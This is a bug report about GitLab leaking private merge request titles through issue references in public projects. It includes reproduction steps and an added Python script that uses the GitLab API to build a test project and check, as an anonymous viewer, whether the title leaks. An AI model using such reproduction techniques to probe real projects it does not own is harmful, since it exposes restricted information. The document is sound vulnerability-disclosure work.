Information leakage with references to MRs where project is public, but MRs are private
The title of an MR can be leaked when the MR is referenced from an issue, even if the project that the MR belongs to restricts access to merge requests to team members.
Discovered on GitLab.com
Steps to reproduce
- Create a public project.
- Modify project settings so the "Feature Visibility" setting for either "Repository" or "Merge requests" is set to "Only Team Members".
- Create a new merge request in the project (you will need to push two divergent branches beforehand). In theory, this MR should only be visible to team members.
- Create an issue that references this MR.
- In a private/incognito browsing window, view the newly created issue.
Expected behavior: for a non-project-member user, the MR reference should not be rendered as a link, and the MR title should not appear in the "Related Merge Requests" section.
Actual behavior: the MR reference is rendered as a link (which leads to a 404), and the MR title is included in the "Related Merge Requests" section.
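As an added example, not part of the original report and not GitLab's code, the following script walks through the steps above with the GitLab v4 REST API and then performs both checks as an anonymous caller. It assumes a personal access token with `api` scope in `GITLAB_TOKEN`, that the project is created in that user's own namespace, that `GET /projects/:id/issues/:iid/related_merge_requests` and `POST /markdown` accept unauthenticated requests and render as an anonymous viewer (i.e. mirror what an incognito browser shows), and the project name `mr-leak-repro`, branch name `leak-test` and sample responses are all invented here. The two check functions are pure and are exercised on constructed sample data so the logic runs offline; the live reproduction only runs when the token is set.

```python
"""Scripted reproduction of the MR-title leak via the GitLab v4 REST API.

Added example, not GitLab's or the reporter's code. Assumptions: a personal
access token with `api` scope in GITLAB_TOKEN; the project is created in that
user's own namespace; the related_merge_requests issue endpoint and the
/markdown endpoint accept unauthenticated calls and render as anonymous.
"""
import json
import os
import re
import sys
from urllib.error import HTTPError
from urllib.parse import quote
from urllib.request import Request, urlopen

API = "https://gitlab.com/api/v4"


def api(method, path, token=None, body=None):
    """Tiny JSON client. token=None models the anonymous (incognito) viewer."""
    headers = {"Content-Type": "application/json"}
    if token:
        headers["PRIVATE-TOKEN"] = token
    data = json.dumps(body).encode() if body is not None else None
    req = Request(API + path, data=data, headers=headers, method=method)
    try:
        with urlopen(req) as resp:
            raw = resp.read()
            return resp.status, (json.loads(raw) if raw else None)
    except HTTPError as err:
        return err.code, None


def reference_rendered_as_link(html, project_path, mr_iid):
    """True if `!<iid>` became an anchor to that MR (the reported behaviour).
    A non-member should get plain text, so the expected value is False.
    The lookahead stops iid 1 from matching a link to MR 12."""
    pattern = re.compile(
        r'<a\b[^>]*href="[^"]*' + re.escape(project_path)
        + r"/-/merge_requests/" + str(mr_iid) + r'(?=[#?"])'
    )
    return pattern.search(html) is not None


def title_leaked_via_related_mrs(related, mr_iid, mr_title):
    """True if the anonymous related_merge_requests response carries the title."""
    return any(
        item.get("iid") == mr_iid and item.get("title") == mr_title
        for item in (related or [])
    )


def reproduce(token):
    """Steps 1-4 authenticated, then the step-5 checks as an anonymous caller."""
    mr_title = "secret-title-" + os.urandom(4).hex()
    _, proj = api("POST", "/projects", token, {
        "name": "mr-leak-repro", "visibility": "public", "initialize_with_readme": True})
    path = proj["path_with_namespace"]
    enc, base = quote(path, safe=""), proj["default_branch"]
    api("PUT", f"/projects/{enc}", token, {"merge_requests_access_level": "private"})
    # Divergent branch without a local push: branch off the default, then commit a file on it.
    api("POST", f"/projects/{enc}/repository/branches", token, {"branch": "leak-test", "ref": base})
    api("POST", f"/projects/{enc}/repository/commits", token, {
        "branch": "leak-test", "commit_message": "diverge",
        "actions": [{"action": "create", "file_path": "leak.txt", "content": "x\n"}]})
    _, mr = api("POST", f"/projects/{enc}/merge_requests", token, {
        "source_branch": "leak-test", "target_branch": base, "title": mr_title})
    _, issue = api("POST", f"/projects/{enc}/issues", token, {
        "title": "reference test", "description": f"See !{mr['iid']}"})

    # Anonymous viewer: the MR itself is a 404, so nothing below should reveal its title.
    mr_status, _ = api("GET", f"/projects/{enc}/merge_requests/{mr['iid']}")
    _, related = api("GET", f"/projects/{enc}/issues/{issue['iid']}/related_merge_requests")
    _, rendered = api("POST", "/markdown", None, {"text": issue["description"], "gfm": True, "project": path})
    return {
        "anonymous_mr_fetch_status": mr_status,  # 404 confirms the MR is hidden from non-members
        "reference_is_link": reference_rendered_as_link((rendered or {}).get("html", ""), path, mr["iid"]),
        "title_in_related": title_leaked_via_related_mrs(related, mr["iid"], mr_title),
    }


# Constructed sample responses (not captured from GitLab), in the shape the checks expect.
SAMPLE_PROJECT = "example-group/mr-leak-repro"
SAMPLE_LEAKY_HTML = ('<p>See <a href="https://gitlab.com/example-group/mr-leak-repro/-/merge_requests/1" '
                     'data-reference-type="merge_request">!1</a></p>')
SAMPLE_SAFE_HTML = "<p>See !1</p>"
SAMPLE_RELATED = [{"iid": 1, "title": "secret-title-deadbeef", "state": "opened"}]


def offline_selfcheck():
    """Run both checks on the constructed samples; a leaky render and a safe one."""
    return {
        "leaky_html_is_link": reference_rendered_as_link(SAMPLE_LEAKY_HTML, SAMPLE_PROJECT, 1),
        "safe_html_is_link": reference_rendered_as_link(SAMPLE_SAFE_HTML, SAMPLE_PROJECT, 1),
        "title_in_related": title_leaked_via_related_mrs(SAMPLE_RELATED, 1, "secret-title-deadbeef"),
    }


if __name__ == "__main__":
    token = os.environ.get("GITLAB_TOKEN")
    print(json.dumps(reproduce(token) if token else offline_selfcheck(), indent=2))
```

With the bug present, the live run reports `anonymous_mr_fetch_status: 404` alongside `reference_is_link: true` and `title_in_related: true`; a fixed instance should return `false` for both checks while the 404 stays. The project the script creates is left in place so the rendered issue can also be inspected in an incognito window.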
Relevant logs and/or screenshots
I did not check to see if the same info leakage exists for issues (i.e. if issue references leak titles when access to issues is restricted), but it might very well be the case that issue titles can also be leaked in the same manner.